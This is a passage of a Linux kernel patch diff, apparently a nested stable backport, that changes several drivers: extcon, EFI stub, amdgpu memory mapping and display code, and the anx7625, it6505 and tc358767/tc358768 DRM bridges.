+ static const struct of_device_id tusb320_extcon_dt_match[] = {
+ 	{ .compatible = "ti,tusb320", .data = &tusb320_ops, },
+ 	{ .compatible = "ti,tusb320l", .data = &tusb320l_ops, },
+@@ -502,7 +526,8 @@ static const struct of_device_id tusb320_extcon_dt_match[] = {
+ MODULE_DEVICE_TABLE(of, tusb320_extcon_dt_match);
+ 
+ static struct i2c_driver tusb320_extcon_driver = {
+-	.probe		= tusb320_probe,
++	.probe_new	= tusb320_probe,
++	.remove		= tusb320_remove,
+ 	.driver		= {
+ 		.name	= "extcon-tusb320",
+ 		.of_match_table = tusb320_extcon_dt_match,
+diff --git a/drivers/extcon/extcon.c b/drivers/extcon/extcon.c
+index e1c71359b6051..7141dd0d407d8 100644
+--- a/drivers/extcon/extcon.c
++++ b/drivers/extcon/extcon.c
+@@ -206,6 +206,14 @@ static const struct __extcon_info {
+  * @attr_name:		"name" sysfs entry
+  * @attr_state:		"state" sysfs entry
+  * @attrs:		the array pointing to attr_name and attr_state for attr_g
++ * @usb_propval:	the array of USB connector properties
++ * @chg_propval:	the array of charger connector properties
++ * @jack_propval:	the array of jack connector properties
++ * @disp_propval:	the array of display connector properties
++ * @usb_bits:		the bit array of the USB connector property capabilities
++ * @chg_bits:		the bit array of the charger connector property capabilities
++ * @jack_bits:		the bit array of the jack connector property capabilities
++ * @disp_bits:		the bit array of the display connector property capabilities
+  */
+ struct extcon_cable {
+ 	struct extcon_dev *edev;
+diff --git a/drivers/firmware/efi/libstub/efi-stub-helper.c b/drivers/firmware/efi/libstub/efi-stub-helper.c
+index 0c493521b25b8..3d9b2469a0dfd 100644
+--- a/drivers/firmware/efi/libstub/efi-stub-helper.c
++++ b/drivers/firmware/efi/libstub/efi-stub-helper.c
+@@ -521,6 +521,9 @@ efi_status_t efi_exit_boot_services(void *handle, void *priv,
+ 	struct efi_boot_memmap *map;
+ 	efi_status_t status;
+ 
++	if (efi_disable_pci_dma)
++		efi_pci_disable_bridge_busmaster();
++
+ 	status = efi_get_memory_map(&map, true);
+ 	if (status != EFI_SUCCESS)
+ 		return status;
+@@ -531,9 +534,6 @@ efi_status_t efi_exit_boot_services(void *handle, void *priv,
+ 		return status;
+ 	}
+ 
+-	if (efi_disable_pci_dma)
+-		efi_pci_disable_bridge_busmaster();
+-
+ 	status = efi_bs_call(exit_boot_services, handle, map->map_key);
+ 
+ 	if (status == EFI_INVALID_PARAMETER) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index 365e3fb6a9e5b..b60b6e6149bf7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -129,9 +129,6 @@ static int amdgpu_cs_p1_user_fence(struct amdgpu_cs_parser *p,
+ 	bo = amdgpu_bo_ref(gem_to_amdgpu_bo(gobj));
+ 	p->uf_entry.priority = 0;
+ 	p->uf_entry.tv.bo = &bo->tbo;
+-	/* One for TTM and two for the CS job */
+-	p->uf_entry.tv.num_shared = 3;
+-
+ 	drm_gem_object_put(gobj);
+ 
+ 	size = amdgpu_bo_size(bo);
+@@ -883,15 +880,19 @@ static int amdgpu_cs_parser_bos(struct amdgpu_cs_parser *p,
+ 
+ 	mutex_lock(&p->bo_list->bo_list_mutex);
+ 
+-	/* One for TTM and one for the CS job */
++	/* One for TTM and one for each CS job */
+ 	amdgpu_bo_list_for_each_entry(e, p->bo_list)
+-		e->tv.num_shared = 2;
++		e->tv.num_shared = 1 + p->gang_size;
++	p->uf_entry.tv.num_shared = 1 + p->gang_size;
+ 
+ 	amdgpu_bo_list_get_list(p->bo_list, &p->validated);
+ 
+ 	INIT_LIST_HEAD(&duplicates);
+ 	amdgpu_vm_get_pd_bo(&fpriv->vm, &p->validated, &p->vm_pd);
+ 
++	/* Two for VM updates, one for TTM and one for each CS job */
++	p->vm_pd.tv.num_shared = 3 + p->gang_size;
++
+ 	if (p->uf_entry.tv.bo && !ttm_to_amdgpu_bo(p->uf_entry.tv.bo)->parent)
+ 		list_add(&p->uf_entry.tv.head, &p->validated);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index a3cd816f98a14..0af9fb4098e8a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -1959,6 +1959,8 @@ static int psp_securedisplay_initialize(struct psp_context *psp)
+ 		psp_securedisplay_parse_resp_status(psp, securedisplay_cmd->status);
+ 		dev_err(psp->adev->dev, "SECUREDISPLAY: query securedisplay TA failed. ret 0x%x\n",
+ 			securedisplay_cmd->securedisplay_out_message.query_ta.query_cmd_ret);
++		/* don't try again */
++		psp->securedisplay_context.context.bin_desc.size_bytes = 0;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+index a4b47e1bd111d..09fc464f5f128 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+@@ -170,8 +170,7 @@ static int amdgpu_reserve_page_direct(struct amdgpu_device *adev, uint64_t addre
+ 
+ 	memset(&err_rec, 0x0, sizeof(struct eeprom_table_record));
+ 	err_data.err_addr = &err_rec;
+-	amdgpu_umc_fill_error_record(&err_data, address,
+-			(address >> AMDGPU_GPU_PAGE_SHIFT), 0, 0);
++	amdgpu_umc_fill_error_record(&err_data, address, address, 0, 0);
+ 
+ 	if (amdgpu_bad_page_threshold != 0) {
+ 		amdgpu_ras_add_bad_pages(adev, err_data.err_addr,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+index 5a8a4cda7e987..58fe7279599f0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+@@ -1427,14 +1427,14 @@ int amdgpu_vm_bo_map(struct amdgpu_device *adev,
+ 	uint64_t eaddr;
+ 
+ 	/* validate the parameters */
+-	if (saddr & ~PAGE_MASK || offset & ~PAGE_MASK ||
+-	    size == 0 || size & ~PAGE_MASK)
++	if (saddr & ~PAGE_MASK || offset & ~PAGE_MASK || size & ~PAGE_MASK)
++		return -EINVAL;
++	if (saddr + size <= saddr || offset + size <= offset)
+ 		return -EINVAL;
+ 
+ 	/* make sure object fit at this offset */
+ 	eaddr = saddr + size - 1;
+-	if (saddr >= eaddr ||
+-	    (bo && offset + size > amdgpu_bo_size(bo)) ||
++	if ((bo && offset + size > amdgpu_bo_size(bo)) ||
+ 	    (eaddr >= adev->vm_manager.max_pfn << AMDGPU_GPU_PAGE_SHIFT))
+ 		return -EINVAL;
+ 
+@@ -1493,14 +1493,14 @@ int amdgpu_vm_bo_replace_map(struct amdgpu_device *adev,
+ 	int r;
+ 
+ 	/* validate the parameters */
+-	if (saddr & ~PAGE_MASK || offset & ~PAGE_MASK ||
+-	    size == 0 || size & ~PAGE_MASK)
++	if (saddr & ~PAGE_MASK || offset & ~PAGE_MASK || size & ~PAGE_MASK)
++		return -EINVAL;
++	if (saddr + size <= saddr || offset + size <= offset)
+ 		return -EINVAL;
+ 
+ 	/* make sure object fit at this offset */
+ 	eaddr = saddr + size - 1;
+-	if (saddr >= eaddr ||
+-	    (bo && offset + size > amdgpu_bo_size(bo)) ||
++	if ((bo && offset + size > amdgpu_bo_size(bo)) ||
+ 	    (eaddr >= adev->vm_manager.max_pfn << AMDGPU_GPU_PAGE_SHIFT))
+ 		return -EINVAL;
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_mqd_manager_v9.c b/drivers/gpu/drm/amd/amdkfd/kfd_mqd_manager_v9.c
+index 0778e587a2d68..eaf084acb706f 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_mqd_manager_v9.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_mqd_manager_v9.c
+@@ -115,18 +115,19 @@ static struct kfd_mem_obj *allocate_mqd(struct kfd_dev *kfd,
+ 			&(mqd_mem_obj->gtt_mem),
+ 			&(mqd_mem_obj->gpu_addr),
+ 			(void *)&(mqd_mem_obj->cpu_ptr), true);
++
++		if (retval) {
++			kfree(mqd_mem_obj);
++			return NULL;
++		}
+ 	} else {
+ 		retval = kfd_gtt_sa_allocate(kfd, sizeof(struct v9_mqd),
+ 				&mqd_mem_obj);
+-	}
+-
+-	if (retval) {
+-		kfree(mqd_mem_obj);
+-		return NULL;
++		if (retval)
++			return NULL;
+ 	}
+ 
+ 	return mqd_mem_obj;
+-
+ }
+ 
+ static void init_mqd(struct mqd_manager *mm, void **mqd,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 91c308cf27eb2..9be3769d68a85 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -6972,13 +6972,7 @@ static int amdgpu_dm_connector_get_modes(struct drm_connector *connector)
+ 				drm_add_modes_noedid(connector, 640, 480);
+ 	} else {
+ 		amdgpu_dm_connector_ddc_get_modes(connector, edid);
+-		/* most eDP supports only timings from its edid,
+-		 * usually only detailed timings are available
+-		 * from eDP edid. timings which are not from edid
+-		 * may damage eDP
+-		 */
+-		if (connector->connector_type != DRM_MODE_CONNECTOR_eDP)
+-			amdgpu_dm_connector_add_common_modes(encoder, connector);
++		amdgpu_dm_connector_add_common_modes(encoder, connector);
+ 		amdgpu_dm_connector_add_freesync_modes(connector, edid);
+ 	}
+ 	amdgpu_dm_fbc_init(connector);
+@@ -8873,6 +8867,8 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 
+ 		/* Now check if we should set freesync video mode */
+ 		if (amdgpu_freesync_vid_mode && dm_new_crtc_state->stream &&
++		    dc_is_stream_unchanged(new_stream, dm_old_crtc_state->stream) &&
++		    dc_is_stream_scaling_unchanged(new_stream, dm_old_crtc_state->stream) &&
+ 		    is_timing_unchanged_for_freesync(new_crtc_state,
+ 						     old_crtc_state)) {
+ 			new_crtc_state->mode_changed = false;
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn30/dcn30_clk_mgr_smu_msg.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn30/dcn30_clk_mgr_smu_msg.c
+index 1fbf1c105dc12..bdbf183066981 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn30/dcn30_clk_mgr_smu_msg.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn30/dcn30_clk_mgr_smu_msg.c
+@@ -312,6 +312,9 @@ void dcn30_smu_set_display_refresh_from_mall(struct clk_mgr_internal *clk_mgr, b
+ 	/* bits 8:7 for cache timer scale, bits 6:1 for cache timer delay, bit 0 = 1 for enable, = 0 for disable */
+ 	uint32_t param = (cache_timer_scale << 7) | (cache_timer_delay << 1) | (enable ? 1 : 0);
+ 
++	smu_print("SMU Set display refresh from mall: enable = %d, cache_timer_delay = %d, cache_timer_scale = %d\n",
++		enable, cache_timer_delay, cache_timer_scale);
++
+ 	dcn30_smu_send_msg_with_param(clk_mgr,
+ 			DALSMC_MSG_SetDisplayRefreshFromMall, param, NULL);
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 087a4838488b2..b405f2e86927d 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -2360,9 +2360,6 @@ static enum surface_update_type det_surface_update(const struct dc *dc,
+ 	enum surface_update_type overall_type = UPDATE_TYPE_FAST;
+ 	union surface_update_flags *update_flags = &u->surface->update_flags;
+ 
+-	if (u->flip_addr)
+-		update_flags->bits.addr_update = 1;
+-
+ 	if (!is_surface_in_context(context, u->surface) || u->surface->force_full_update) {
+ 		update_flags->raw = 0xFFFFFFFF;
+ 		return UPDATE_TYPE_FULL;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c b/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
+index b7c2844d0cbee..f294f2f8c75bc 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
+@@ -810,7 +810,7 @@ static bool CalculatePrefetchSchedule(
+ 			*swath_width_chroma_ub = dml_ceil(SwathWidthY / 2 - 1, myPipe->BlockWidth256BytesC) + myPipe->BlockWidth256BytesC;
+ 	} else {
+ 		*swath_width_luma_ub = dml_ceil(SwathWidthY - 1, myPipe->BlockHeight256BytesY) + myPipe->BlockHeight256BytesY;
+-		if (myPipe->BlockWidth256BytesC > 0)
++		if (myPipe->BlockHeight256BytesC > 0)
+ 			*swath_width_chroma_ub = dml_ceil(SwathWidthY / 2 - 1, myPipe->BlockHeight256BytesC) + myPipe->BlockHeight256BytesC;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_rq_dlg_calc_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_rq_dlg_calc_32.c
+index 395ae8761980f..9ba6cb67655f4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_rq_dlg_calc_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_rq_dlg_calc_32.c
+@@ -116,7 +116,7 @@ void dml32_rq_dlg_get_rq_reg(display_rq_regs_st *rq_regs,
+ 	else
+ 		rq_regs->rq_regs_l.min_meta_chunk_size = dml_log2(min_meta_chunk_bytes) - 6 + 1;
+ 
+-	if (min_meta_chunk_bytes == 0)
++	if (p1_min_meta_chunk_bytes == 0)
+ 		rq_regs->rq_regs_c.min_meta_chunk_size = 0;
+ 	else
+ 		rq_regs->rq_regs_c.min_meta_chunk_size = dml_log2(p1_min_meta_chunk_bytes) - 6 + 1;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 85d53597eb07a..f7ed3e655e397 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -431,7 +431,13 @@ static int sienna_cichlid_append_powerplay_table(struct smu_context *smu)
+ {
+ 	struct atom_smc_dpm_info_v4_9 *smc_dpm_table;
+ 	int index, ret;
+-	I2cControllerConfig_t *table_member;
++	PPTable_beige_goby_t *ppt_beige_goby;
++	PPTable_t *ppt;
++
++	if (smu->adev->ip_versions[MP1_HWIP][0] == IP_VERSION(11, 0, 13))
++		ppt_beige_goby = smu->smu_table.driver_pptable;
++	else
++		ppt = smu->smu_table.driver_pptable;
+ 
+ 	index = get_index_into_master_table(atom_master_list_of_data_tables_v2_1,
+ 					    smc_dpm_info);
+@@ -440,9 +446,13 @@ static int sienna_cichlid_append_powerplay_table(struct smu_context *smu)
+ 				      (uint8_t **)&smc_dpm_table);
+ 	if (ret)
+ 		return ret;
+-	GET_PPTABLE_MEMBER(I2cControllers, &table_member);
+-	memcpy(table_member, smc_dpm_table->I2cControllers,
+-			sizeof(*smc_dpm_table) - sizeof(smc_dpm_table->table_header));
++
++	if (smu->adev->ip_versions[MP1_HWIP][0] == IP_VERSION(11, 0, 13))
++		smu_memcpy_trailing(ppt_beige_goby, I2cControllers, BoardReserved,
++				    smc_dpm_table, I2cControllers);
++	else
++		smu_memcpy_trailing(ppt, I2cControllers, BoardReserved,
++				    smc_dpm_table, I2cControllers);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.c b/drivers/gpu/drm/bridge/analogix/anx7625.c
+index b0ff1ecb80a50..213263ad6a064 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.c
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.c
+@@ -1689,6 +1689,14 @@ static int anx7625_parse_dt(struct device *dev,
+ 	if (of_property_read_bool(np, "analogix,audio-enable"))
+ 		pdata->audio_en = 1;
+ 
++	return 0;
++}
++
++static int anx7625_parse_dt_panel(struct device *dev,
++				  struct anx7625_platform_data *pdata)
++{
++	struct device_node *np = dev->of_node;
++
+ 	pdata->panel_bridge = devm_drm_of_get_bridge(dev, np, 1, 0);
+ 	if (IS_ERR(pdata->panel_bridge)) {
+ 		if (PTR_ERR(pdata->panel_bridge) == -ENODEV) {
+@@ -2034,7 +2042,7 @@ static int anx7625_register_audio(struct device *dev, struct anx7625_data *ctx)
+ 	return 0;
+ }
+ 
+-static int anx7625_attach_dsi(struct anx7625_data *ctx)
++static int anx7625_setup_dsi_device(struct anx7625_data *ctx)
+ {
+ 	struct mipi_dsi_device *dsi;
+ 	struct device *dev = &ctx->client->dev;
+@@ -2044,9 +2052,6 @@ static int anx7625_attach_dsi(struct anx7625_data *ctx)
+ 		.channel = 0,
+ 		.node = NULL,
+ 	};
+-	int ret;
+-
+-	DRM_DEV_DEBUG_DRIVER(dev, "attach dsi\n");
+ 
+ 	host = of_find_mipi_dsi_host_by_node(ctx->pdata.mipi_host_node);
+ 	if (!host) {
+@@ -2067,14 +2072,24 @@ static int anx7625_attach_dsi(struct anx7625_data *ctx)
+ 		MIPI_DSI_MODE_VIDEO_HSE	|
+ 		MIPI_DSI_HS_PKT_END_ALIGNED;
+ 
+-	ret = devm_mipi_dsi_attach(dev, dsi);
++	ctx->dsi = dsi;
++
++	return 0;
++}
++
++static int anx7625_attach_dsi(struct anx7625_data *ctx)
++{
++	struct device *dev = &ctx->client->dev;
++	int ret;
++
++	DRM_DEV_DEBUG_DRIVER(dev, "attach dsi\n");
++
++	ret = devm_mipi_dsi_attach(dev, ctx->dsi);
+ 	if (ret) {
+ 		DRM_DEV_ERROR(dev, "fail to attach dsi to host.\n");
+ 		return ret;
+ 	}
+ 
+-	ctx->dsi = dsi;
+-
+ 	DRM_DEV_DEBUG_DRIVER(dev, "attach dsi succeeded.\n");
+ 
+ 	return 0;
+@@ -2562,8 +2577,41 @@ static void anx7625_runtime_disable(void *data)
+ 	pm_runtime_disable(data);
+ }
+ 
+-static int anx7625_i2c_probe(struct i2c_client *client,
+-			     const struct i2c_device_id *id)
++static int anx7625_link_bridge(struct drm_dp_aux *aux)
++{
++	struct anx7625_data *platform = container_of(aux, struct anx7625_data, aux);
++	struct device *dev = aux->dev;
++	int ret;
++
++	ret = anx7625_parse_dt_panel(dev, &platform->pdata);
++	if (ret) {
++		DRM_DEV_ERROR(dev, "fail to parse DT for panel : %d\n", ret);
++		return ret;
++	}
++
++	platform->bridge.funcs = &anx7625_bridge_funcs;
++	platform->bridge.of_node = dev->of_node;
++	if (!anx7625_of_panel_on_aux_bus(dev))
++		platform->bridge.ops |= DRM_BRIDGE_OP_EDID;
++	if (!platform->pdata.panel_bridge)
++		platform->bridge.ops |= DRM_BRIDGE_OP_HPD |
++					DRM_BRIDGE_OP_DETECT;
++	platform->bridge.type = platform->pdata.panel_bridge ?
++				    DRM_MODE_CONNECTOR_eDP :
++				    DRM_MODE_CONNECTOR_DisplayPort;
++
++	drm_bridge_add(&platform->bridge);
++
++	if (!platform->pdata.is_dpi) {
++		ret = anx7625_attach_dsi(platform);
++		if (ret)
++			drm_bridge_remove(&platform->bridge);
++	}
++
++	return ret;
++}
++
++static int anx7625_i2c_probe(struct i2c_client *client)
+ {
+ 	struct anx7625_data *platform;
+ 	struct anx7625_platform_data *pdata;
+@@ -2637,6 +2685,24 @@ static int anx7625_i2c_probe(struct i2c_client *client,
+ 	platform->aux.wait_hpd_asserted = anx7625_wait_hpd_asserted;
+ 	drm_dp_aux_init(&platform->aux);
+ 
++	ret = anx7625_parse_dt(dev, pdata);
++	if (ret) {
++		if (ret != -EPROBE_DEFER)
++			DRM_DEV_ERROR(dev, "fail to parse DT : %d\n", ret);
++		goto free_wq;
++	}
++
++	if (!platform->pdata.is_dpi) {
++		ret = anx7625_setup_dsi_device(platform);
++		if (ret < 0)
++			goto free_wq;
++	}
++
++	/*
++	 * Registering the i2c devices will retrigger deferred probe, so it
++	 * needs to be done after calls that might return EPROBE_DEFER,
++	 * otherwise we can get an infinite loop.
++	 */
+ 	if (anx7625_register_i2c_dummy_clients(platform, client) != 0) {
+ 		ret = -ENOMEM;
+ 		DRM_DEV_ERROR(dev, "fail to reserve I2C bus.\n");
+@@ -2651,13 +2717,21 @@ static int anx7625_i2c_probe(struct i2c_client *client,
+ 	if (ret)
+ 		goto free_wq;
+ 
+-	devm_of_dp_aux_populate_ep_devices(&platform->aux);
+-
+-	ret = anx7625_parse_dt(dev, pdata);
++	/*
++	 * Populating the aux bus will retrigger deferred probe, so it needs to
++	 * be done after calls that might return EPROBE_DEFER, otherwise we can
++	 * get an infinite loop.
++	 */
++	ret = devm_of_dp_aux_populate_bus(&platform->aux, anx7625_link_bridge);
+ 	if (ret) {
+-		if (ret != -EPROBE_DEFER)
+-			DRM_DEV_ERROR(dev, "fail to parse DT : %d\n", ret);
+-		goto free_wq;
++		if (ret != -ENODEV) {
++			DRM_DEV_ERROR(dev, "failed to populate aux bus : %d\n", ret);
++			goto free_wq;
++		}
++
++		ret = anx7625_link_bridge(&platform->aux);
++		if (ret)
++			goto free_wq;
+ 	}
+ 
+ 	if (!platform->pdata.low_power_mode) {
+@@ -2670,27 +2744,6 @@ static int anx7625_i2c_probe(struct i2c_client *client,
+ 	if (platform->pdata.intp_irq)
+ 		queue_work(platform->workqueue, &platform->work);
+ 
+-	platform->bridge.funcs = &anx7625_bridge_funcs;
+-	platform->bridge.of_node = client->dev.of_node;
+-	if (!anx7625_of_panel_on_aux_bus(&client->dev))
+-		platform->bridge.ops |= DRM_BRIDGE_OP_EDID;
+-	if (!platform->pdata.panel_bridge)
+-		platform->bridge.ops |= DRM_BRIDGE_OP_HPD |
+-					DRM_BRIDGE_OP_DETECT;
+-	platform->bridge.type = platform->pdata.panel_bridge ?
+-				    DRM_MODE_CONNECTOR_eDP :
+-				    DRM_MODE_CONNECTOR_DisplayPort;
+-
+-	drm_bridge_add(&platform->bridge);
+-
+-	if (!platform->pdata.is_dpi) {
+-		ret = anx7625_attach_dsi(platform);
+-		if (ret) {
+-			DRM_DEV_ERROR(dev, "Fail to attach to dsi : %d\n", ret);
+-			goto unregister_bridge;
+-		}
+-	}
+-
+ 	if (platform->pdata.audio_en)
+ 		anx7625_register_audio(dev, platform);
+ 
+@@ -2698,12 +2751,6 @@ static int anx7625_i2c_probe(struct i2c_client *client,
+ 
+ 	return 0;
+ 
+-unregister_bridge:
+-	drm_bridge_remove(&platform->bridge);
+-
+-	if (!platform->pdata.low_power_mode)
+-		pm_runtime_put_sync_suspend(&client->dev);
+-
+ free_wq:
+ 	if (platform->workqueue)
+ 		destroy_workqueue(platform->workqueue);
+@@ -2756,7 +2803,7 @@ static struct i2c_driver anx7625_driver = {
+ 		.of_match_table = anx_match_table,
+ 		.pm = &anx7625_pm_ops,
+ 	},
+-	.probe = anx7625_i2c_probe,
++	.probe_new = anx7625_i2c_probe,
+ 	.remove = anx7625_i2c_remove,
+ 
+ 	.id_table = anx7625_id,
+diff --git a/drivers/gpu/drm/bridge/ite-it6505.c b/drivers/gpu/drm/bridge/ite-it6505.c
+index 99123eec45511..292c4f6da04af 100644
+--- a/drivers/gpu/drm/bridge/ite-it6505.c
++++ b/drivers/gpu/drm/bridge/ite-it6505.c
+@@ -3085,7 +3085,7 @@ static ssize_t receive_timing_debugfs_show(struct file *file, char __user *buf,
+ 					   size_t len, loff_t *ppos)
+ {
+ 	struct it6505 *it6505 = file->private_data;
+-	struct drm_display_mode *vid = &it6505->video_info;
++	struct drm_display_mode *vid;
+ 	u8 read_buf[READ_BUFFER_SIZE];
+ 	u8 *str = read_buf, *end = read_buf + READ_BUFFER_SIZE;
+ 	ssize_t ret, count;
+@@ -3094,6 +3094,7 @@ static ssize_t receive_timing_debugfs_show(struct file *file, char __user *buf,
+ 		return -ENODEV;
+ 
+ 	it6505_calc_video_info(it6505);
++	vid = &it6505->video_info;
+ 	str += scnprintf(str, end - str, "---video timing---\n");
+ 	str += scnprintf(str, end - str, "PCLK:%d.%03dMHz\n",
+ 			 vid->clock / 1000, vid->clock % 1000);
+diff --git a/drivers/gpu/drm/bridge/tc358767.c b/drivers/gpu/drm/bridge/tc358767.c
+index b9b681086fc49..7ef78283e3d3e 100644
+--- a/drivers/gpu/drm/bridge/tc358767.c
++++ b/drivers/gpu/drm/bridge/tc358767.c
+@@ -1890,7 +1890,7 @@ static int tc_mipi_dsi_host_attach(struct tc_data *tc)
+ 	if (dsi_lanes < 0)
+ 		return dsi_lanes;
+ 
+-	dsi = mipi_dsi_device_register_full(host, &info);
++	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
+ 	if (IS_ERR(dsi))
+ 		return dev_err_probe(dev, PTR_ERR(dsi),
+ 				     "failed to create dsi device\n");
+@@ -1901,7 +1901,7 @@ static int tc_mipi_dsi_host_attach(struct tc_data *tc)
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_SYNC_PULSE;
+ 
+-	ret = mipi_dsi_attach(dsi);
++	ret = devm_mipi_dsi_attach(dev, dsi);
+ 	if (ret < 0) {
+ 		dev_err(dev, "failed to attach dsi to host: %d\n", ret);
+ 		return ret;
+diff --git a/drivers/gpu/drm/bridge/tc358768.c b/drivers/gpu/drm/bridge/tc358768.c
+index 4c4b77ce8aba3..2d0ac9987b58e 100644
+--- a/drivers/gpu/drm/bridge/tc358768.c
++++ b/drivers/gpu/drm/bridge/tc358768.c
+@@ -9,6 +9,8 @@
+ #include <linux/gpio/consumer.h>
+ #include <linux/i2c.h>
+ #include <linux/kernel.h>
++#include <linux/media-bus-format.h>
++#include <linux/minmax.h>
+ #include <linux/module.h>
+ #include <linux/regmap.h>
+ #include <linux/regulator/consumer.h>
+@@ -147,6 +149,7 @@ struct tc358768_priv {
+ 
+ 	u32 pd_lines; /* number of Parallel Port Input Data Lines */
+ 	u32 dsi_lanes; /* number of DSI Lanes */
++	u32 dsi_bpp; /* number of Bits Per Pixel over DSI */
+ 
+ 	/* Parameters for PLL programming */
+ 	u32 fbd;	/* PLL feedback divider */
+@@ -285,12 +288,12 @@ static void tc358768_hw_disable(struct tc358768_priv *priv)
+ 
+ static u32 tc358768_pll_to_pclk(struct tc358768_priv *priv, u32 pll_clk)
+ {
+-	return (u32)div_u64((u64)pll_clk * priv->dsi_lanes, priv->pd_lines);
++	return (u32)div_u64((u64)pll_clk * priv->dsi_lanes, priv->dsi_bpp);
+ }
+ 
+ static u32 tc358768_pclk_to_pll(struct tc358768_priv *priv, u32 pclk)
+ {
+-	return (u32)div_u64((u64)pclk * priv->pd_lines, priv->dsi_lanes);
++	return (u32)div_u64((u64)pclk * priv->dsi_bpp, priv->dsi_lanes);
+ }
+ 
+ static int tc358768_calc_pll(struct tc358768_priv *priv,
+@@ -335,13 +338,17 @@ static int tc358768_calc_pll(struct tc358768_priv *priv,
+ 		u32 fbd;
+ 
+ 		for (fbd = 0; fbd < 512; ++fbd) {
+-			u32 pll, diff;
++			u32 pll, diff, pll_in;
+ 
+ 			pll = (u32)div_u64((u64)refclk * (fbd + 1), divisor);
+ 
+ 			if (pll >= max_pll || pll < min_pll)
+ 				continue;
+ 
++			pll_in = (u32)div_u64((u64)refclk, prd + 1);
++			if (pll_in < 4000000)
++				continue;
++
+ 			diff = max(pll, target_pll) - min(pll, target_pll);
+ 
+ 			if (diff < best_diff) {
+@@ -423,6 +430,7 @@ static int tc358768_dsi_host_attach(struct mipi_dsi_host *host,
+ 	priv->output.panel = panel;
+ 
+ 	priv->dsi_lanes = dev->lanes;
++	priv->dsi_bpp = mipi_dsi_pixel_format_to_bpp(dev->format);
+ 
+ 	/* get input ep (port0/endpoint0) */
+ 	ret = -EINVAL;
+@@ -434,7 +442,7 @@ static int tc358768_dsi_host_attach(struct mipi_dsi_host *host,
+ 	}
+ 
+ 	if (ret)
+-		priv->pd_lines = mipi_dsi_pixel_format_to_bpp(dev->format);
++		priv->pd_lines = priv->dsi_bpp;
+ 
+ 	drm_bridge_add(&priv->bridge);
+ 
+@@ -633,6 +641,7 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	struct mipi_dsi_device *dsi_dev = priv->output.dev;
+ 	unsigned long mode_flags = dsi_dev->mode_flags;
+ 	u32 val, val2, lptxcnt, hact, data_type;
++	s32 raw_val;
+ 	const struct drm_display_mode *mode;
+ 	u32 dsibclk_nsk, dsiclk_nsk, ui_nsk, phy_delay_nsk;
+ 	u32 dsiclk, dsibclk, video_start;
+@@ -737,25 +746,26 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 
+ 	/* 38ns < TCLK_PREPARE < 95ns */
+ 	val = tc358768_ns_to_cnt(65, dsibclk_nsk) - 1;
+-	/* TCLK_PREPARE > 300ns */
+-	val2 = tc358768_ns_to_cnt(300 + tc358768_to_ns(3 * ui_nsk),
+-				  dsibclk_nsk);
+-	val |= (val2 - tc358768_to_ns(phy_delay_nsk - dsibclk_nsk)) << 8;
